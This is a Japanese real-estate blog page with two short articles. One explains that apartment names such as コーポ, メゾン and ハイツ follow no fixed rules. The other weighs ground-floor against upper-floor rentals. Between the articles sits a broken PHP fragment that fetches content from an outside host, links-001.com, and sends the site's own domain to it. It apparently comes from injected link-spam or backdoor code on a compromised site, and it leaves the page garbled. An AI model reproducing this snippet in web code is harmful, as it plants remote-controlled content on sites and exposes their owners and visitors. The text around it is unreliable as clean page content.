コーポとメゾンとハイツに差があるのか

良くマンションとアパートの差はどこにあるかの問題が起こります。
ボロボロでもマンションと掲げているところがありますし、高層なのにアパートと掲げているところもあります。
どんな名称にするかの決まりは特にないとされています。
ただ、業界においては一定の基準を設けているとされます。
鉄筋か木造かなどが基準とされます。
その他に気になるのがコーポ、メゾン、ハイツなどです。
どれも集合住宅に付けられる名称です。
それらの名前がついていると設備も新しいように感じます。
実際に現場に行ってみるとかなり古い物件だったのでがっかりした人もいるでしょう。
これらの名称のつけ方に特に決まりはないとされています。
ですから名前に惑わされてはいけません。
下手をするとすべてローマ字になっていても、古いアパートの建物のこともあります。
だからと言って法律違反ではありません。
英語やドイツ語、フランス語などが使われることが多かったですが、最近はスペイン語なども使われています。
カーサとつけられている物件がそれに該当します。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

賃貸を利用するときに階数はどれくらい重要か

一戸建ての場合、その建物を自由に使えます。
平屋もあれば二階建て、三階建てなどもありますが、好みのように使うと良いでしょう。
アパートやマンションンの場合は、メゾネットで無ければ一つの階を利用します。
一番の下の階から間の階、一番上の階などを利用することができます。
一階のメリットは、移動が少ないことでしょう。
物件に入って後は自分の居室に行くだけになります。
階段もエレベーターも使う必要がありません。
ただセキュリティ上の不安はあります。
外からの侵入は最もされやすくなるので、玄関や窓などにそれなりに策を施したりが必要になります。
二階以上だと、移動がそれなりに大変です。
物件数とエレベーターの数、定員が合わないと結構住みにくくなります。
上階に行くと大変ですがそれなりに眺望が良くなります。
セキュリティの面も1階に比べると良いと言えるでしょう。
しかし上階だから安心できるわけではありません。
引越しなどの時は結構大変です。

最新記事